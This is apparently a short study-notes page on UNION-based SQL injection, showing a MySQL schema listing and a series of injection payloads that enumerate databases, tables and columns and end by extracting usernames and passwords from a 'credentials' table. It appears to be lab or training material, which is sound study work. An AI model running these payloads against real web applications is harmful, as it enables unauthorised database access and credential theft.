Database Enumeration

mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
+--------------------+
| SCHEMA_NAME        |
+--------------------+
| mysql              |
| information_schema |
| performance_schema |
| ilfreight          |
| dev                |
+--------------------+
6 rows in set (0.01 sec)

# show all database above
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA--

# show using database
cn' UNION select 1,database(),2,3--

# show target database tables with using INFORMATION_SCHEMA.TABLES
cn'
UNION
select 1,TABLE_NAME,TABLE_SCHEMA,4
from INFORMATION_SCHEMA.TABLES
where table_schema='dev'--

# show target tables columns with using INFORMATION_SCHEMA.COLUMNS
cn'
UNION
select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA
from INFORMATION_SCHEMA.COLUMNS
where table_name='credentials'--

cn' UNION select 1,username,password,4 from dev.credentials--

PreviousUnion Injection NextReading Files

Last updated 3 months ago